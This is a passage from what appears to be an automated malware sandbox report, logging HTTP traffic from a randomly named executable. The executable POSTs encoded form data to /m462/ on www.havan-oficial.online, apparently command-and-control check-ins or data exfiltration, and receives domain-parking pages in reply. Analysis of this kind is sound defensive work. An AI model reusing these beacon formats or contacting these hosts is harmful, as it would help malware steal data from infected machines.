                                                                                                Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 [TRUNCATED]
                                                                                                Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
                                                                                                Nov 11, 2024 17:01:52.348331928 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 69 74 72 79 6e 61 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 6e 69 65 20 6a 65 73 74 20 73 6b 6f 6e 66 69 67 75 72 6f 77 61 6e 61 20 6e 61 20 73
                                                                                                Data Ascii: '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno doda
                                                                                                Nov 11, 2024 17:01:52.348392010 CET1289INData Raw: 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 bb d0 b0 d1 88 d1 82 d0 be d0 b2 d0 b0 d0 bd d0 b8 d0 b9 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 96 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d1 83 2e 27 2c
                                                                                                Data Ascii: edex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:01:52.348445892 CET1289INData Raw: 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 d0 a1 d0 b0 d0 b9 d1 82 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0
                                                                                                Data Ascii: '.message1': ' <b>www.redex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:01:52.348490000 CET1122INData Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 64 69 73 70 6c 61 79 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.11.2049759199.59.243.227807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:57.670465946 CET780OUTPOST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 6f 64 55 65 66 32 31 54 47 6b 52 63 37 42 72 6f 68 4d 66 66 62 64 57 75 4e 4f 5a 30 52 48 72 42 6e 34 64 2f 50 67 6a 6a 76 4e 34 4d 30 34 78 76 55 2b 4c 33 45 77 75 6a 61 41 2b 52 69 37 74 73 43 52 64 58 48 62 54 56 36 32 36 63 71 4d 52 68 4a 68 34 73 38 33 2f 6e 43 4c 47 45 66 2b 36 79 74 63 47 51 6f 33 45 5a 61 62 44 43 46 4f 4c 75 53 44 47 6d 73 57 72 4f 48 75 42 52 69 43 77 6b 62 71 77 55 33 45 61 2f 64 4f 6e 54 43 54 73 53 31 46 67 64 6a 43 6b 57 68 54 43 39 76 53 71 62 32 42 76 59 36 39 75 45 53 71 5a 62 78 6e 48 49 4d 33 55 4d 62 77 3d 3d
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFodUef21TGkRc7BrohMffbdWuNOZ0RHrBn4d/PgjjvN4M04xvU+L3EwujaA+Ri7tsCRdXHbTV626cqMRhJh4s83/nCLGEf+6ytcGQo3EZabDCFOLuSDGmsWrOHuBRiCwkbqwU3Ea/dOnTCTsS1FgdjCkWhTC9vSqb2BvY69uESqZbxnHIM3UMbw==
                                                                                                Nov 11, 2024 17:01:57.805486917 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:01:56 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 9cf3408c-f899-4562-9db9-4f51656571a2
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=9cf3408c-f899-4562-9db9-4f51656571a2; expires=Mon, 11 Nov 2024 16:16:57 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:01:57.805496931 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWNmMzQwOGMtZjg5OS00NTYyLTlkYjktNGY1MTY1NjU3MWEyIiwicGFnZV90aW1lIjoxNzMxMzQwOTE3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.11.2049760199.59.243.227807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:00.314034939 CET800OUTPOST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 71 39 6b 65 5a 55 64 54 52 30 51 75 31 68 72 6f 72 73 66 54 62 64 71 75 4e 4b 41 72 52 56 50 42 6e 59 4e 2f 4f 69 62 6a 73 4e 34 4d 73 6f 78 71 61 65 4c 43 45 77 7a 65 61 42 43 52 69 37 35 73 43 54 46 58 48 4b 54 57 34 6d 36 65 73 4d 52 6a 47 42 34 73 38 33 2f 6e 43 4c 54 5a 66 36 75 79 75 73 32 51 71 56 38 65 53 37 44 4e 54 65 4c 75 59 6a 47 69 73 57 72 73 48 76 64 37 69 41 34 6b 62 6f 34 55 35 31 61 38 4b 65 6e 56 63 6a 74 5a 34 33 38 53 6e 53 45 41 6b 78 72 67 72 42 32 58 36 33 69 43 6e 50 61 67 52 35 46 70 31 58 2b 67 4f 31 56 58 47 7a 71 55 67 36 57 6f 2b 37 47 58 2b 50 42 6a 6c 54 78 45 5a 30 63 3d
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVPBnYN/OibjsN4MsoxqaeLCEwzeaBCRi75sCTFXHKTW4m6esMRjGB4s83/nCLTZf6uyus2QqV8eS7DNTeLuYjGisWrsHvd7iA4kbo4U51a8KenVcjtZ438SnSEAkxrgrB2X63iCnPagR5Fp1X+gO1VXGzqUg6Wo+7GX+PBjlTxEZ0c=
                                                                                                Nov 11, 2024 17:02:00.449143887 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:00 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 7cd97e61-6963-4d28-a3f0-5f4033ab2e4f
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=7cd97e61-6963-4d28-a3f0-5f4033ab2e4f; expires=Mon, 11 Nov 2024 16:17:00 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:02:00.449215889 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2NkOTdlNjEtNjk2My00ZDI4LWEzZjAtNWY0MDMzYWIyZTRmIiwicGFnZV90aW1lIjoxNzMxMzQwOTIwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.11.2049761199.59.243.227807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:02.982228994 CET2578OUTPOST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 71 39 6b 65 5a 55 64 54 52 30 51 75 31 68 72 6f 72 73 66 54 62 64 71 75 4e 4b 41 72 52 56 48 42 6e 72 31 2f 4f 44 62 6a 74 4e 34 4d 67 49 78 72 61 65 4c 6c 45 77 37 53 61 42 4f 76 69 35 42 73 44 77 4e 58 51 49 37 57 78 6d 36 65 75 4d 52 6d 4a 68 34 39 38 33 76 6a 43 4c 44 5a 66 36 75 79 75 71 79 51 75 48 45 65 51 37 44 43 46 4f 4c 79 53 44 48 48 73 57 6a 57 48 76 5a 42 69 77 59 6b 56 6f 49 55 30 6d 79 38 56 75 6e 58 64 6a 73 5a 34 33 78 53 6e 53 59 6d 6b 79 32 31 72 43 57 58 35 68 36 63 69 73 66 34 41 34 77 6c 34 33 6a 65 59 58 4e 37 45 69 36 70 6a 59 65 49 79 2f 47 7a 30 64 4e 77 30 42 5a 37 48 42 45 63 73 32 6b 4a 6a 54 33 63 73 76 31 32 42 36 63 6c 56 75 79 46 64 4d 53 43 76 4f 42 36 75 5a 55 68 55 35 6f 67 46 57 75 4b 53 35 4e 57 37 46 54 75 56 2f 30 45 4d 47 68 57 31 45 78 33 52 71 7a 31 43 66 31 4a 4f 31 2b 6e 6e 53 58 63 38 35 4d 69 69 74 5a 76 39 6e 44 50 50 5a 2b 58 33 74 33 75 59 4f 45 32 57 72 4b 56 66 48 52 4f 70 5a 58 6a 47 54 32 77 65 [TRUNCATED]
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVHBnr1/ODbjtN4MgIxraeLlEw7SaBOvi5BsDwNXQI7Wxm6euMRmJh4983vjCLDZf6uyuqyQuHEeQ7DCFOLySDHHsWjWHvZBiwYkVoIU0my8VunXdjsZ43xSnSYmky21rCWX5h6cisf4A4wl43jeYXN7Ei6pjYeIy/Gz0dNw0BZ7HBEcs2kJjT3csv12B6clVuyFdMSCvOB6uZUhU5ogFWuKS5NW7FTuV/0EMGhW1Ex3Rqz1Cf1JO1+nnSXc85MiitZv9nDPPZ+X3t3uYOE2WrKVfHROpZXjGT2weUm87fFwW8iDkD8TIGPZwSMcdj5ADB/qHtnIVAranSWYLj7kkjV44/DP+Pm/PxinxrAwBTVj9XugG2qWC5tC+oZswAkZx3nF1zQbDy7ShuubRWFibEk0ghR9gyuOLMI/VFqQDt2XBZF+DUIM93oWnypE+wUCMExD8vsIogz4mGRG3dr0xDg2rhZ1GamFv0iG6liH9WdEoBVwhxSKuodKvCJiVkI2LODfFNfqrjXrYHwhKGvq+Z+zK3bLFd6Aq+o+4a8lsdSOxLAaukuNxs17MqfIuu/MME6Y6HpmjUt0CS05oMLaB5T79B09FDM1dlqPJIN2fcIRqf9eQQt37AVqF7GvTBrIPjP15V8mqeZjh4jHyQ//4erzKAjiceKrWwZ5NB+/IdYaSP+h6dtHU9w3cPpCymGfEwMT9GNhl6n3BT3CndFMotm5EhfLAe2QZB35Y/qsBP+hEzJTPY1kbOjx8IxwQX7xh9196rckZsqrcXIl/yhY123lbaKclOshyBCYPfHETByBNVdldL3/bDoLXbznTH8s/WrphValp3yqRO8IeN/nNKLKfBuADCRJVnkPmpJO63H9KcEzBUQkbl6CH3/cnmYTDesnOrJnKpNdGq/v0e5Wy8A1RSwpjySD6+OVl0m7h/D6mAtUol/zjJ0KOTX7qo3SeBYY2AJ [TRUNCATED]
                                                                                                Nov 11, 2024 17:02:02.982302904 CET5371OUTData Raw: 65 49 2f 47 70 44 57 43 6f 30 68 30 44 64 78 36 4d 37 57 55 51 55 61 51 48 30 6b 49 33 61 57 4c 5a 54 6d 67 55 75 41 70 4f 32 6c 53 72 47 53 64 76 46 4d 6c 30 2f 48 65 59 41 51 5a 53 64 61 2f 32 48 4b 58 35 77 58 76 5a 4f 32 30 7a 66 4c 34 34 33
                                                                                                Data Ascii: eI/GpDWCo0h0Ddx6M7WUQUaQH0kI3aWLZTmgUuApO2lSrGSdvFMl0/HeYAQZSda/2HKX5wXvZO20zfL4430ON5BUELlJKQFMkgzIMfzJaW+qMol71wr/mfBA96f0ucz1rwMGrPyrS0NeDitOTipC5yNK4qafxTIllUzK7Owp1Tbr/fOf9MhBZxFyWijOdr1YcMSmH9ZX9pZnwcaHN9DFG3E6mOW6t1Nb72tzGMdTsfkjeNPQoSW
                                                                                                Nov 11, 2024 17:02:03.117254019 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:02 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 4ab9bd4c-feaf-4c50-9f73-fd00803b2f91
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=4ab9bd4c-feaf-4c50-9f73-fd00803b2f91; expires=Mon, 11 Nov 2024 16:17:03 GMT; path=/
                                                                                                connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 38 42 52 46 4c 50 76 33 77 56 36 34 6a 69 49 49 78 47 57 43 56 44 38 48 2b 49 70 63 4c 5a 55 68 30 34 61 34 51 4a 53 4e 56 53 2b 6e 75 4b 41 6e 4f 2f 6f 33 58 37 5a 59 7a 33 6b 38 79 30 54 36 50 36 53 68 63 6a 67 44 6e 4d 5a 6d 63 73 62 77 67 7a 4e 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                Nov 11, 2024 17:02:03.117263079 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGFiOWJkNGMtZmVhZi00YzUwLTlmNzMtZmQwMDgwM2IyZjkxIiwicGFnZV90aW1lIjoxNzMxMzQwOTIzLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.11.2049762199.59.243.227807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:05.638314009 CET504OUTGET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:05.773503065 CET1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:05 GMT
